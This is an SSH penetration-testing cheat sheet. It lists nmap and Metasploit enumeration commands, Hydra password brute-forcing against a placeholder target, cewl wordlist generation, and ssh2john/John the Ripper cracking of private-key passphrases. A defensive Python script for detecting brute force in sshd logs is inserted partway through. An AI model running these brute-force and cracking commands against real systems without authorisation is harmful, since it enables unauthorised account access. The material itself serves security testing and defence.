SSH (Secure Shell) Pentesting
Cryptography, Network, Privilege Escalation
SSH is a cryptographic network protocol for operating network services securely over an unsecured network. The default port is 22.
Enumeration
nmap --script ssh-brute -p 22 <target-ip>
nmap --script ssh-auth-methods --script-args="ssh.user=username" -p 22 <target-ip>
nmap --script ssh-* -p 22 <target-ip>
# User enumeration
msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers
Brute Force Credentials
# -t: number of parallel tasks
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4
# Specific port
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4
If the target host has port 80 or 443 open, you can generate a wordlist from the contents of the website and then feed it to Hydra.
cewl http://<target-ip> > wordlist.txt
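A defender-side counterpart to the brute-force commands above, added here as an example that is not part of the original page: the script parses OpenSSH auth-log lines and flags any source address with five or more failed password attempts inside a 60-second window, which is the footprint a Hydra run like the ones above leaves on the target. The log lines, hostname and IP addresses are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines in the syslog format OpenSSH writes to auth.log.
SAMPLE_LOG = """\
Mar  1 10:00:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51000 ssh2
Mar  1 10:00:02 host sshd[1202]: Failed password for root from 203.0.113.7 port 51001 ssh2
Mar  1 10:00:03 host sshd[1203]: Failed password for root from 203.0.113.7 port 51002 ssh2
Mar  1 10:00:04 host sshd[1204]: Failed password for invalid user test from 203.0.113.7 port 51003 ssh2
Mar  1 10:00:05 host sshd[1205]: Failed password for invalid user oracle from 203.0.113.7 port 51004 ssh2
Mar  1 10:00:06 host sshd[1206]: Accepted publickey for alice from 198.51.100.20 port 40000 ssh2: ED25519 SHA256:constructed
Mar  1 10:03:30 host sshd[1207]: Failed password for alice from 198.51.100.20 port 40001 ssh2
Mar  1 10:09:00 host sshd[1208]: Failed password for root from 203.0.113.7 port 51005 ssh2
"""

# Matches both "Failed password for root" and "Failed password for invalid user admin".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_failed_logins(log_text):
    """Group failed password attempts by source IP as (timestamp, username) pairs."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less syslog stamp
            attempts[m.group("ip")].append((ts, m.group("user")))
    return attempts

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: {"failures": total, "users": [...]}} for IPs that hit the threshold in one window."""
    hits = {}
    for ip, events in parse_failed_logins(log_text).items():
        events.sort()
        start = 0  # sliding window over the sorted attempts of this source
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = {"failures": len(events), "users": sorted({u for _, u in events})}
                break
    return hits

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failed logins, usernames tried: {', '.join(info['users'])}")
```

The single failed login from 198.51.100.20 stays below the threshold and is not reported, so a lone mistyped password does not raise an alert.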
Crack SSH Private Key
First of all, you need to convert the private key into a format that John can recognize.
ssh2john private_key.txt > hash.txt
# or
python2 /usr/share/john/ssh2john.py private_key.txt > hash.txt
Then crack the passphrase of the private key using the formatted hash file.
john --wordlist=wordlist.txt hash.txt